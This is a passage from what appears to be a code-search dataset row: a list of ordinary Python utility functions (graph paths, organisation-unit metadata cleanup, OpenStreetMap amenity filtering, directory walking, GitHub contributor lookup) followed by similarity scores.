1):\n print(\"This path 
is\", this_path)\n node1 = path[i]\n node2 = path[i + 1]\n print(\"node1={}, node2={}\".format(node1, node2))\n if (node1, node2) in self.mapping:\n sc = self.mapping[(node1, node2)]\n print(\"uses sc edge for {}\".format(sc))\n print(\"should add {}, but also need to check for overlaps\".\n format(sc[1:-1]))\n if sc[1] in this_path:\n # we have an overlap\n start = len(this_path) - this_path.index(sc[1])\n this_path.extend(sc[start:-1])\n else:\n this_path.extend(sc[1:-1])\n add_next_node = False # next node is second of sc edge\n elif add_next_node:\n this_path.append(node1)\n else:\n add_next_node = True\n this_path.append(path[-1])\n self.converted_paths.append(this_path)", "def check_and_replace_root_ou_assigned(metaobj):\n if isinstance(metaobj, list):\n root_uid = \"\"\n placeholder = '<OU_ROOT_UID>'\n for obj in metaobj:\n root_uid_replaced = False\n if 'organisationUnits' in obj and len(obj['organisationUnits']) == 1 and \\\n 'userOrganisationUnit' in obj and obj['userOrganisationUnit'] == False and \\\n 'userOrganisationUnitChildren' in obj and obj['userOrganisationUnitChildren'] == False and \\\n 'userOrganisationUnitGrandChildren' in obj and obj['userOrganisationUnitGrandChildren'] == False:\n if root_uid == \"\":\n # Get the root UID\n root_ou = get_metadata_element('organisationUnits', 'level:eq:1')\n if len(root_ou) > 1:\n logger.warning('More than one OU root found in OU Tree')\n root_uid = root_ou[0]['id']\n if obj['organisationUnits'][0]['id'] == root_uid:\n # Remove and use a placeholder\n obj['organisationUnits'][0] = {'id': placeholder}\n root_uid_replaced = True\n elif len(obj['organisationUnits']) > 1:\n # In this case we have a list of organisation units. Remove them and raise a warning\n obj['organisationUnits'] = []\n logger.warning(\n \"The dashboard item with UID \" + obj['id'] + \" has organisation units assigned... Removing\")\n # Remove and use a placeholder also for parentGraphMap\n if 'parentGraphMap' in obj and obj['parentGraphMap'] and root_uid in obj['parentGraphMap']:\n obj['parentGraphMap'][placeholder] = obj['parentGraphMap'][root_uid]\n del obj['parentGraphMap'][root_uid]\n root_uid_replaced = True\n\n if root_uid_replaced:\n # Warn the user\n logger.warning('Element ' + obj['id'] + ' has root OU assigned to it ('\n + root_uid + ')... 
Replacing with placeholder: ' + placeholder)\n\n return metaobj", "def get_organization_unit(self):\n return self.reference[REF_ORGANIZATION_UNIT][REF_VALUE]", "def social_amenity(osm_path): \n return (retrieve(osm_path,'multipolygons',['amenity'],**{'amenity':[\"='hospital' or \",\"='doctors' or \",\"='clinic' or \",\"='dentist' or \",\"='pharmacy'\"]})).rename(columns={'amenity': 'asset'})", "def _orgsWithLogoForQuery(query, batch_size=5):\n orgs = []\n for org in query:\n if org.logo_url:\n orgs.append(org)\n if len(orgs) == batch_size:\n break\n\n return orgs", "def dir_by_levels(path, levels):\n return op.abspath(op.join(path, *(['..'] * levels)))", "def get_ontology_contributors(repo_path):\n url = 'https://api.github.com/repos/{}/contributors'.format(repo_path)\n # TODO: allow use of oath token;\n # GH has a quota for non-logged in API calls\n time.sleep(3)\n with closing(requests.get(url, stream=False)) as resp:\n ok = resp.status_code == 200\n if ok:\n results = resp.json()\n logging.info(\"RESP={}\".format(results))\n return results\n else:\n logging.error(\"Failed: {}\".format(url))\n return []", "def get_path_ancestry(path: Path) -> Iterable[Path]:\n reverse_parents = reversed(path.parents)\n if path.is_dir():\n return chain(reverse_parents, [path])\n return reverse_parents", "def get_isobath(llcrnrlon=None, urcrnrlon=None, llcrnrlat=None,\n urcrnrlat=None, iso=-200., tfile='dap'):\n plt.ioff()\n lon, lat, topo = etopo_subset(llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,\n llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,\n tfile=tfile)\n\n fig, ax = plt.subplots()\n cs = ax.contour(lon, lat, topo, [iso])\n path = cs.collections[0].get_paths()[0]\n del(fig, ax, cs)\n plt.ion()\n return path.vertices[:, 0], path.vertices[:, 1]", "def get_path(input_dictionary, output_dictionary,\n input_species_list, output_species_list):\n\n input_operon_list = []\n path_queue = [(input_operon_list, input_species_list) ]\n\n final_operon_path_list = []\n final_species_path_list = []\n\n while path_queue != []:\n\n ###print \"\\nget_path: path queue:\",path_queue\n\n path_queue,\\\n final_operon_path_list,\\\n final_species_path_list = traverse(input_dictionary,\n output_dictionary,\n input_species_list,\n output_species_list,\n path_queue,\n final_operon_path_list,\n final_species_path_list)\n\n return final_operon_path_list, final_species_path_list", "def walk2(dirname):\n for root, dirs, files in os.walk(dirname):\n for filename in files:\n print(os.path.join(root, filename))", "def walk2(dirname):\n for root, dirs, files in os.walk(dirname):\n for filename in files:\n print(os.path.join(root, filename))", "def test_get_namespaces_from_accounts(self):\n pass", "def get_is_org_user(carto_sql_client):\n resp = carto_sql_client.send('SHOW search_path')\n paths = resp['rows'][0]['search_path'].split(',')\n\n # if 'public' is first element, user is not in an org\n return bool(paths[0] != 'public')", "def pathlookup(obj_or_path_tuple, depth=None, include_origin=True):", "def retrieve_catalog_for_path(self, needle_path):\n clg = self.retrieve_root_catalog()\n while True:\n new_nested_reference = clg.find_nested_for_path(needle_path)\n if new_nested_reference is None:\n break\n nested_reference = new_nested_reference\n clg = self.retrieve_catalog(nested_reference.hash)\n return clg" ]
[ "0.5943409", "0.5662944", "0.5541912", "0.5307396", "0.52833915", "0.52833915", "0.51416296", "0.51335", "0.5058733", "0.5023612", "0.50106674", "0.4983386", "0.49637613", "0.49609458", "0.49326625", "0.49166146", "0.49147454", "0.49008152", "0.4848601", "0.48095214", "0.47985002", "0.47953928", "0.47874194", "0.47285697", "0.47135007", "0.46970645", "0.46951032", "0.46913072", "0.46748507", "0.46727067", "0.46497136", "0.46039099", "0.459378", "0.44992596", "0.44972956", "0.44966474", "0.44873047", "0.44873047", "0.44654134", "0.4463726", "0.44586426", "0.44139174", "0.44068617", "0.43931967", "0.43776104", "0.43738896", "0.4367782", "0.4366889", "0.4360955", "0.43528494", "0.43450752", "0.43413115", "0.431553", "0.43110156", "0.43039268", "0.42890534", "0.42808124", "0.4280474", "0.424959", "0.42452484", "0.42417586", "0.4241041", "0.42398405", "0.42391065", "0.42386153", "0.42231768", "0.42198518", "0.42129278", "0.42119274", "0.42019406", "0.42015767", "0.41942757", "0.4193471", "0.41927716", "0.41921586", "0.4180584", "0.41593373", "0.41591674", "0.41563115", "0.4148069", "0.41473687", "0.4140578", "0.41347983", "0.4129648", "0.41278774", "0.41259313", "0.41185403", "0.41178146", "0.41002464", "0.40996888", "0.40978476", "0.40801254", "0.40772355", "0.40760005", "0.40701333", "0.40701333", "0.40675542", "0.40493363", "0.4047335", "0.40403423" ]
0.7749507
0
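The get_ou_from_path document above walks the OU tree one path element at a time through an external pagination helper (utils.generic_paginator). For comparison, the same lookup can be sketched with boto3's built-in Organizations paginator; this is a minimal illustrative sketch, not part of the record itself, and the function name and wiring are assumptions:

import boto3

def resolve_ou_path(path, org_client=None):
    # Walk an OU path such as "/workloads/prod" down from the organization root.
    org_client = org_client or boto3.client("organizations")
    current_ou = org_client.list_roots()["Roots"][0]["Id"]
    if path == "/":
        return {"Id": current_ou, "Path": path}
    paginator = org_client.get_paginator("list_organizational_units_for_parent")
    for dir_name in path.split("/")[1:]:
        match = None
        # Page through the children of the current OU, looking for the next path element.
        for page in paginator.paginate(ParentId=current_ou):
            for org_unit in page["OrganizationalUnits"]:
                if org_unit["Name"] == dir_name:
                    match = org_unit["Id"]
                    break
            if match:
                break
        if match is None:
            raise ValueError("OU path not found")
        current_ou = match
    return {"Id": current_ou, "Path": path}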
given a path, get all the AWS accounts within that part of an Organization...
def get_accounts_for_ou(logger, options, org_client, path): logger.debug("Getting accounts for OU: %s", path) org_unit = get_ou_from_path(logger, org_client, path) ous = [] if options.no_recursive: ous.append(org_unit) else: ous.extend(get_child_ous(logger, org_client, org_unit)) result = [] for org_unit in ous: args = {"ParentId":org_unit["Id"]} accounts = utils.generic_paginator(logger, org_client.list_accounts_for_parent, "Accounts", **args) for acc in accounts: acc["Path"] = org_unit["Path"] if 'Status' in acc: if acc['Status'] != 'SUSPENDED': result.append(acc) else: logger.info("found suspended account %s, ignoring it." % acc) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def ls():\n return dynamodb.ls(OrganizationModel)", "async def get_organizations(request: Request):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n return [org for org in organizations_obj]", "def get_account():\n\n bus = session_bus()\n\n goa_manager = bus.get_object(GOA_NAME, GOA_PATH)\n\n goa_objects = goa_manager.GetManagedObjects(dbus_interface=OBJECT_MANAGER)\n\n accounts = [\n obj for obj in goa_objects\n if obj != GOA_MANAGER_PATH\n ]\n\n if len(accounts) > 1:\n sys.exit(\"More than one account found.\")\n\n (account_path,) = accounts\n\n return bus.get_object(GOA_NAME, account_path)", "def get_buckets_for_user(self):\n s3 = self.credentials.session.resource('s3')\n bucket_list = [bucket.name for bucket in s3.buckets.all()]\n\n return bucket_list;", "def organizations(self):\n self.elements('organizations')", "def test_get_namespaces_from_account(self):\n pass", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "def test_get_namespaces_from_accounts(self):\n pass", "def _get_arns(self):\n client = self._get_client()\n\n account_arns = set()\n\n for role in list_roles(**self.conn_details):\n account_arns.add(role['Arn'])\n\n for user in list_users(**self.conn_details):\n account_arns.add(user['Arn'])\n\n for page in client.get_paginator('list_policies').paginate(Scope='Local'):\n for policy in page['Policies']:\n account_arns.add(policy['Arn'])\n\n for page in client.get_paginator('list_groups').paginate():\n for group in page['Groups']:\n account_arns.add(group['Arn'])\n\n result_arns = set()\n for arn in self.arn_list:\n if arn.lower() == 'all':\n return account_arns\n\n if arn not in account_arns:\n self.current_app.logger.warn(\"Provided ARN {arn} not found in account.\".format(arn=arn))\n continue\n\n result_arns.add(arn)\n\n self.current_app.logger.debug(\"got %d arns\", len(result_arns))\n return list(result_arns)", "def fetch_account_catalogs(account:str):\n for config in accounts:\n if account in config['streamers']:\n return config['catalogs']\n return", "def get_accounts(self):\n uri = '/credentials'\n response = gate_request(uri=uri)\n assert response.ok, 'Failed to get accounts: {0}'.format(response.text)\n\n all_accounts = response.json()\n self.log.debug('Accounts in Spinnaker:\\n%s', all_accounts)\n\n filtered_accounts = []\n for account in all_accounts:\n if account['type'] == self.provider:\n filtered_accounts.append(account)\n\n if not filtered_accounts:\n raise ForemastError('No Accounts matching {0}.'.format(self.provider))\n\n return filtered_accounts", "def _recurse(self) -> Iterator[str]:\n\n client: s3.Client = boto3.client('s3')\n\n decoded_url = urlparse(self.url)\n bucket_name = decoded_url.netloc\n\n paginator = client.get_paginator('list_objects_v2')\n\n page_iterator: PageIterator = paginator.paginate(\n Bucket=bucket_name,\n Prefix=decoded_url.path.lstrip('/'),\n )\n\n for page in page_iterator:\n records = page.get('Contents', [])\n\n for record in records:\n key = record['Key']\n yield f's3://{bucket_name}/{key}'", "def fetch_accounts(self):\n return self.fetch('/accounts')", "def get_organization_links(self):\n yield from self.get_resource_by_item(\"/orgs\")", "def accountId():\n # save the lookup if we set the account to the environment\n if \"AWS_ACCOUNT_ID\" in os.environ:\n return os.environ[\"AWS_ACCOUNT_ID\"]\n conn = iamConn()\n funcs = [\n lambda: 
conn.get_user().get('get_user_response')\\\n .get('get_user_result').get('user').get('arn'),\n lambda: conn.list_roles(max_items=1).get('list_roles_response')\\\n .get('list_roles_result').get('roles')[0].get('arn'),\n ]\n for func in funcs:\n try:\n arn = func()\n break\n except (boto.exception.BotoServerError, IndexError):\n pass\n return arn.split(':')[4]", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def get_accounts(self, session: \"Session\") -> List[Account]:\n\n self.__get_dn(session)\n\n result = session.soapclient.get_accounts_by_owner(self.dn)\n return [Account(session, account=r) for r in result]", "def accounts(web3):\n return web3.eth.accounts", "def fetch_owner_accounts():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n return owner_accounts", "def get_organization_links_by_page(self):\n return self.get_resource_by_page(\"/orgs\")", "def find_by_account(cls,account):\n for credentials in cls.credential_list:\n if credentials.account == account:\n return credentials", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def test_get_all_for_organization(self):\n org = Organization.create(name='foo', program_id=self.program.uid)\n org.put()\n user = User.create(name='foo', email='foo@bar.com',\n owned_organizations=[org.uid])\n user.put()\n response = self.testapp.get(\n '/api/organizations/{}/users'.format(org.uid),\n headers=self.login_headers(user),\n )\n response_list = json.loads(response.body)\n self.assertEqual(len(response_list), 1)", "def amazon_accounts():\n import json\n from security_monkey.datastore import Account, AccountType\n from os.path import dirname, join\n\n data_file = join(dirname(dirname(__file__)), \"data\", \"aws_accounts.json\")\n data = json.load(open(data_file, 'r'))\n\n app.logger.info('Adding / updating Amazon owned accounts')\n try:\n account_type_result = AccountType.query.filter(AccountType.name == 'AWS').first()\n if not account_type_result:\n account_type_result = AccountType(name='AWS')\n db.session.add(account_type_result)\n db.session.commit()\n db.session.refresh(account_type_result)\n\n for group, info in data.items():\n for aws_account in info['accounts']:\n acct_name = \"{group} ({region})\".format(group=group, region=aws_account['region'])\n account = Account.query.filter(Account.identifier == aws_account['account_id']).first()\n if not account:\n app.logger.debug(' Adding account {0}'.format(acct_name))\n account = Account()\n else:\n app.logger.debug(' Updating account {0}'.format(acct_name))\n\n account.identifier = aws_account['account_id']\n account.account_type_id = account_type_result.id\n account.active = False\n account.third_party = True\n account.name = acct_name\n account.notes = info['url']\n\n db.session.add(account)\n\n db.session.commit()\n app.logger.info('Finished adding Amazon owned accounts')\n except Exception as e:\n app.logger.exception(\"An error occured while adding accounts\")\n store_exception(\"manager-amazon-accounts\", None, e)", "def get_creds(bucket_name, folder_name):\n client = boto3.client('sts')\n # pprint(client.get_caller_identity())\n\n # A name of 
our choice (no spaces allowed)\n credential_name = f'AccessTimeline-{folder_name}'\n policy = {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n # A name of our choice [0-9a-zA-Z]\n \"Sid\": f'ListBucket{folder_name}',\n \"Action\": [\n \"s3:ListBucket\",\n ],\n \"Effect\": \"Allow\",\n \"Resource\": [\n f'arn:aws:s3:::{bucket_name}',\n ],\n \"Condition\": {\n \"StringEquals\": {\n \"s3:prefix\": [\n f'{folder_name}/'\n ],\n \"s3:delimiter\": [\n '/'\n ],\n }\n }\n\n },\n {\n \"Sid\": f'GetObject{folder_name}',\n \"Action\": [\n \"s3:GetObject\",\n ],\n \"Effect\": \"Allow\",\n \"Resource\": [\n f'arn:aws:s3:::{bucket_name}/{folder_name}/*',\n ],\n\n # FIXME: it should be possible to place restrictions using Condition,\n # but I haven't been able to get this to work.\n #\n # \"Condition\": {\n # \"StringLike\": {\n # \"s3:prefix\": [\n # f'{folder_name}/*'\n # ],\n # \"s3:delimiter\": [\n # '/'\n # ],\n # }\n # }\n },\n ]\n }\n\n # pprint(policy)\n policy = json.dumps(policy)\n credential_lifetime = 900 # 900 seconds is the minimum value\n\n creds = client.get_federation_token(\n Name=credential_name,\n Policy=policy,\n DurationSeconds=credential_lifetime,\n )\n\n # pprint(creds)\n return creds['Credentials']", "def list_buckets():\n for bucket in s3.buckets.all():\n print(bucket)", "def listOrganizations(self, name='', type=''):\n return self.get_json('/organization', {'name': name, 'type': type})", "def Accounts(self):\n\n if not self.connected:\n return []\n\n try:\n accounts_listing = _ReadNoProxy(\n GOOGLE_GCE_METADATA_ACCOUNTS_URI + '/')\n accounts_lines = accounts_listing.split()\n accounts = []\n for account_line in accounts_lines:\n account = account_line.strip('/')\n if account == 'default':\n continue\n accounts.append(account)\n return accounts\n except urllib2.HTTPError as e:\n raise MetadataServerException(e)\n except urllib2.URLError as e:\n raise CannotConnectToMetadataServerException(e)", "def test_get_all_organization(self):\n self.client.force_authenticate(user=self.inventory_manager)\n response = self.client.get(\"/organization/\")\n self.assertEqual(response.status_code,\n status.HTTP_403_FORBIDDEN)", "def organizations(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"organizations\")", "def get_s3_keys(bucket, user_keys = None):\n keys = []\n if user_keys is None:\n \t\t\t\ts3 = boto3.client('s3')\n else:\n s3 = boto3.client('s3', \n aws_access_key_id = user_keys[\"AWS_ACCESS_KEY_ID\"], \n aws_secret_access_key = user_keys[\"AWS_SECRET_ACCESS_KEY\"], \n region_name = user_keys[\"REGION_NAME\"]\n ) \t \n \n resp = s3.list_objects_v2(Bucket= bucket)\n for obj in resp['Contents']:\n keys.append(obj['Key'])\n return keys", "def organizations(self):\r\n return organizations.Organizations(self)", "def search_accounts(request, client):\n try:\n result = client(SearchRequest(request, 10))\n return result\n except Exception as e:\n logging.warning(e)\n return []", "def ls(region_name=DEFAULT_REGION):\n s3conn = s3.connect_to_region(region_name)\n buckets = s3conn.get_all_buckets()\n for bucket in buckets:\n print(bucket.name)", "def atlas_organizations():\n pass", "def common_organization_path(organization: str,) -> str:\n return \"organizations/{organization}\".format(organization=organization,)", "def iterate_bucket_objects(self, bucket):\n client = self.credentials.session.client('s3')\n page_iterator = client.list_objects_v2(Bucket=bucket)\n if 'Contents' not in page_iterator:\n return []\n for item in page_iterator['Contents']:\n yield 
item", "def _generate_accounts(self):\n accounts = []\n auth_url = 'http://{}:5000/v3/'.format(self.host)\n\n for tenant, network in self.tenants:\n account = RwcalYang.CloudAccount.from_dict({\n 'name': 'rift.auto.openstack',\n 'account_type': 'openstack',\n 'openstack': {\n 'key': self.user or self._DEFAULT_USERNAME,\n 'secret': self._DEFAULT_PASSWORD,\n 'auth_url': auth_url,\n 'tenant': tenant,\n 'mgmt_network': network}})\n\n accounts.append(account)\n\n return accounts", "def accounts(self):\n # get the summary data\n options = { 'PayLoadText' : self.request_xml() }\n\n print(self.url)\n print(options)\n\n response = requests.get(self.url, params=options) \\\n .content\n print(response)\n xml_tree = xml.etree.cElementTree.fromstring(response)\n\n status = xml_tree.find('ServiceResponse/Status').text\n\n if status != 'success':\n raise requests.exceptions.RequestException()\n\n self.security_token = xml_tree.find('ClientSecurityToken').text\n\n accounts = [ \n self.create_account(account)\n for account in xml_tree.iter('CardAccounts')\n ]\n\n return accounts", "def load_accounts(path):\n with open(path, 'r') as f:\n acc = [x.strip() for x in f.readlines()]\n return acc", "def organization_list(request):\n return [o.slug for o in Organization.objects.all()]", "def accounts(self):\r\n return resources.Accounts(self)", "def get_addresses_by_account(account):\n try:\n stdout = subprocess.check_output([\"litecoin-cli\", \"getaddressesbyaccount\", account])\n addresses = json.loads(stdout.decode())\n except:\n sys.exit(1)\n\n return addresses", "def account_keys(chain):\n return chain.backend.account_keys", "def get_users_from_account(self, path=None, user_name=None, user_id=None,\n delegate_account=None, search=False):\n self.log.debug('Attempting to fetch all access matching- user_id:' +\n str(user_id) + ' user_name:' + str(user_name) + \" acct_name:\" +\n str(delegate_account))\n retlist = []\n params = {}\n if search:\n re_meth = re.search\n else:\n re_meth = re.match\n if delegate_account:\n params['DelegateAccount'] = delegate_account \n response = self.get_response_items('ListUsers', params, item_marker='users',\n list_marker='Users')\n for user in response:\n if path is not None and not re_meth(path, user['path']):\n continue\n if user_name is not None and not re_meth(user_name, user['user_name']):\n continue\n if user_id is not None and not re_meth(user_id, user['user_id']):\n continue\n retlist.append(user)\n return retlist", "def test_retrieve_l_organizations(self):\n pass", "def get_accounts(self):\n return self.accounts", "async def get_user_account(self):\n uri = \"/v3/spot/assets\"\n success, error = await self.request(\"GET\", uri, auth=True)\n return success, error", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def accounts():", "def test_get_all_for_other_organization(self):\n org = Organization.create(name='foo', program_id=self.program.uid)\n org.put()\n user = User.create(name='foo', email='foo@bar.com')\n user.put()\n response = self.testapp.get(\n '/api/organizations/{}/users'.format(org.uid),\n headers=self.login_headers(user),\n status=403\n )", "def GetAccountList(self):\n\t\treturn self.accounts.keys()", "def get_accounts(self):\r\n return self._accounts", "def users(self,org_id=None):\n if org_id is None:\n org_id = self.org_id\n return self.get('{}/orgs/{}/users'.format(ApiVersion.A1.value,org_id))", "def service_accounts(self) -> Sequence[str]:\n return pulumi.get(self, 
\"service_accounts\")", "def fetch_organization(organization):\n return fetch_json(organization_url, organization)", "def _list_orgs(self, context):\r\n try:\r\n rtn = {'context': context,\r\n 'orgs': sorted(list(self._bbreader.cache[context].keys()))}\r\n except KeyError:\r\n raise RequestError('Context {} not found'.format(context))\r\n return rtn", "def list_s3_resources(memberAccountId=None, nextToken=None, maxResults=None):\n pass", "def list_storage_accounts(resource_group_name=None):\n scf = storage_client_factory()\n if resource_group_name:\n accounts = scf.storage_accounts.list_by_resource_group(resource_group_name)\n else:\n accounts = scf.storage_accounts.list()\n return list(accounts)", "def get_accessible_spaces(user):\n if not user:\n return []\n obj_list = get_objects_for_user(user, 'access_space',Space)\\\n .order_by('-created_at')\n return obj_list", "def get_all_in_region(self, cloud_account_id: str, region_id: str) -> List[Dict]:\n\t\tquery_parameters = {'cloudAccountId': cloud_account_id, 'regionId': region_id}\n\t\treturn self._get(route=AWSSecurityGroupConsts.CLOUD_SECURITY_GROUP.value, params=query_parameters)", "def get_accounts(self):\n\n\t\treturn self.__accounts", "def list_accounts(self):\n pass", "def keys(self, bucket, user=None):\n raise NotImplementedError('TODO')", "def common_organization_path(\n organization: str,\n ) -> str:\n return \"organizations/{organization}\".format(\n organization=organization,\n )", "def getProjectsQueryForOrgs(org_keys):\n query = getProjectsQuery()\n query.filter('org IN', org_keys)\n return query", "def get_payee_accounts(payee: str) -> list[str]:\n return g.ledger.attributes.payee_accounts(payee)", "def get_matching_s3_keys(client, bucket, prefix=\"\", suffix=\"\"):\n\n for obj in get_matching_s3_objects(client, bucket, prefix, suffix):\n yield obj[\"Key\"]", "def account(request):\n def searchAccounts(prop, domain, added, response):\n prefix = request.GET.get('q').lower()\n limit = _clean_int(request.GET.get('limit'), 10, 10, 100)\n\n accounts_query = models.Account.query(\n prop >= prefix, prop < prefix + u\"\\ufffd\").order(prop)\n for account in accounts_query:\n if account.blocked:\n continue\n if account.key in added:\n continue\n if domain and not account.email.endswith(domain):\n continue\n if len(added) >= limit:\n break\n added.add(account.key)\n response += '%s (%s)\\n' % (account.email, account.nickname)\n return added, response\n\n added = set()\n response = ''\n domain = os.environ['AUTH_DOMAIN']\n if domain != 'gmail.com':\n # 'gmail.com' is the value AUTH_DOMAIN is set to if the app is running\n # on appspot.com and shouldn't prioritize the custom domain.\n added, response = searchAccounts(\n models.Account.lower_email, domain, added, response)\n added, response = searchAccounts(\n models.Account.lower_nickname, domain, added, response)\n\n added, response = searchAccounts(\n models.Account.lower_nickname, \"\", added, response)\n added, response = searchAccounts(\n models.Account.lower_email, \"\", added, response)\n return HttpTextResponse(response)", "def get_usofa_account_ids(bucketname):\n usofa_data = _get_usofa_data(bucketname)\n return [account_data['id'] for account_data in usofa_data.values()]", "def myorgs(request):\n context = RequestContext(request)\n \n user = request.user\n orgs = user.orgusers.get_query_set()\n \n context['orgs'] = orgs\n return render_to_response('myorgs.html', context)", "def get_organizations(\n self, *, params: Optional[dict] = None\n ) -> 
\"resource_types.Organizations\":\n\n return communicator.Organizations(self.__requester).fetch(parameters=params)", "def test_getorgs(self):\n pass", "def get_accounts(self):\n return self.accounts.all()", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def find_aws_credentials(profile):\n if not profile:\n access_key = None\n secret_key = None\n region = None\n token = \"\"\n credentials = botocore.session.get_session().get_credentials()\n if credentials:\n access_key = credentials.access_key\n secret_key = credentials.secret_key\n region = credentials.region\n token = getattr(credentials, \"token\") or \"\"\n if not access_key or not secret_key:\n raise RuntimeError(\"No Default AWS profile set\")\n\n ret = {\n \"aws_access_key_id\": access_key,\n \"aws_secret_access_key\": secret_key,\n \"aws_session_token\": token,\n }\n # only add the region if it is defined\n if region:\n ret[\"region\"] = region\n\n return ret\n else:\n\n folder = os.path.join(os.path.expanduser(\"~\"), \".aws\")\n filename = os.path.join(folder, \"credentials\")\n cfg = configparser.ConfigParser()\n with open(filename) as fp:\n cfg.read_file(fp)\n ret = {}\n if profile not in cfg:\n raise RuntimeError(\n \"No AWS profile '%s' found in %s\" % (profile, filename)\n )\n for key in cfg[profile]:\n ret[key] = cfg[profile][key]\n return ret", "def get_all_users(self, account_name=None, account_id=None, path=None,\n user_name=None, user_id=None, search=False ):\n userlist=[]\n accounts = self.get_all_accounts(account_id=account_id, account_name=account_name,\n search=search)\n for account in accounts:\n #if account['account_id'] == self.account_id:\n # access =self.get_users_from_account()\n #else:\n if account.get('account_id') == self.eucarc.account_id:\n delegate_account = None\n else:\n delegate_account = account['account_name']\n users = self.get_users_from_account(path=path,\n user_name=user_name,\n user_id=user_id,\n delegate_account=delegate_account,\n search=search)\n for user in users:\n user['account_name']=account['account_name']\n user['account_id']=account['account_id']\n userlist.append(user)\n return userlist", "def get_ad_entries(cohesity_client):\n resp = cohesity_client.active_directory.get_active_directory_entry()\n if resp:\n ad_list = list()\n for each_ad in resp:\n ad_list.append(each_ad.domain_name)\n config_dict[each_ad.domain_name] = [\n \"username\", \"password\", \"machine_accounts\"]\n exported_res_dict[\"Active directories\"] = ad_list\n return resp", "def accounts(self):\n return self._accounts.values()", "def get_organization_details(self):\n\n # Returns 1) OU Name to OU ID mapping (dict)\n # key: OU Name (in the manifest); value: OU ID (at root level)\n # 2) all OU IDs under root (dict)\n org = Organizations(self.logger)\n all_ou_ids, ou_name_to_id_map = self._get_ou_ids(org)\n\n # Returns 1) active accounts (list) under an OU.\n # use case: used to validate accounts in the manifest file\n # 2) Accounts for each OU at the root level.\n # use case: map OU Name to account IDs\n # key: OU ID (str); value: Active accounts (list)\n accounts_in_all_ous, ou_id_to_account_map = \\\n self._get_accounts_in_ou(org, all_ou_ids)\n\n # Returns account name in manifest to account id mapping.\n # key: account name; value: account id\n name_to_account_map = self.get_account_for_name(org)\n\n return 
accounts_in_all_ous, ou_id_to_account_map, \\\n ou_name_to_id_map, name_to_account_map", "def list_buckets():\n for bucket in BUCKET_MANAGER.all_buckets():\n print(bucket)", "def get_objects(self, bucket, s3_client=None):\n\n try:\n all_objects = s3_client.list_objects_v2(Bucket=bucket)\n except botocore.exceptions.EndpointConnectionError:\n logging.error(\"Couldn't connect to an S3 endpoint. If you're using an S3 compatible provider other than AWS, remember to set --s3-endpoint-url\")\n sys.exit(1)\n\n if 'Contents' in all_objects.keys():\n all_objects = [ k['Key'] for k in [ obj for obj in all_objects['Contents'] ]] # pylint: disable=unnecessary-comprehension\n else:\n all_objects = []\n\n return all_objects", "def get_bucketlist():\n pass", "def get_storage_account_list(credentials: Credentials, subscription_id: str) -> List[Dict]:\n try:\n client = get_client(credentials, subscription_id)\n storage_account_list = list(map(lambda x: x.as_dict(), client.storage_accounts.list()))\n\n # ClientAuthenticationError and ResourceNotFoundError are subclasses under HttpResponseError\n except ClientAuthenticationError as e:\n logger.warning(f\"Client Authentication Error while retrieving storage accounts - {e}\")\n return []\n except ResourceNotFoundError as e:\n logger.warning(f\"Storage Account not found error - {e}\")\n return []\n except HttpResponseError as e:\n logger.warning(f\"Error while retrieving storage accounts - {e}\")\n return []\n\n for storage_account in storage_account_list:\n x = storage_account['id'].split('/')\n storage_account['resourceGroup'] = x[x.index('resourceGroups') + 1]\n\n return storage_account_list", "def get_regions_in_partition(self, prefix=None, delimiter='/'):\n if prefix is None:\n prefix = self.s3_path\n else:\n prefix = self._strip_slashes(prefix)\n\n query_params = {\n 'Bucket': self.s3_bucket,\n 'Prefix': prefix + '/',\n 'Delimiter': delimiter\n }\n\n # We currently should be able to get all regions in a single request\n # TODO: Fail if we get a next token - there's more to this prefix than meets the eye\n region_list = []\n response = self.s3_client.list_objects_v2(**query_params)\n for c_prefix in response.get('CommonPrefixes', []):\n region = self._extract_region_from_prefix(c_prefix)\n if region:\n region_list.append(region)\n\n return region_list", "def service_account(configure_security: None) -> Iterator[Dict[str, Any]]:\n yield from tls._service_account_impl(configure_security)", "def get_acls():\n return config.get_cfg_storage(ID_ACL)", "def asset_get():\n search_assets = request.args.getlist(\"name\")\n find_assets = []\n for asset_name in search_assets:\n if asset_name in app.bank:\n find_assets.append(app.bank[asset_name].to_list())\n find_assets = sorted(find_assets, key=lambda s: s[0])\n return jsonify(find_assets)", "def get_accounts(self):\n\n data = {\n 'customerId': self.personal_identity_number,\n 'responseControl': {\n 'filter': {\n 'includes': ['ALL']\n }\n }\n }\n\n headers = {'Content-type': 'application/json',\n 'Accept': 'application/json',\n 'CSRFToken': self.json_token}\n path = '/im/json/overview/getaccounts'\n req = self.session.post(\n self.BASE_URL + path,\n data=json.dumps(data),\n headers=headers)\n\n for account in req.json()['response']['accounts']:\n self.accounts[account['number']] = account\n del(self.accounts[account['number']]['number'])\n\n return self.accounts", "def get_arns(profile, cluster, started_by=None):\n result = None\n client = boto3client.get(\"ecs\", profile)\n params = {}\n params[\"cluster\"] = 
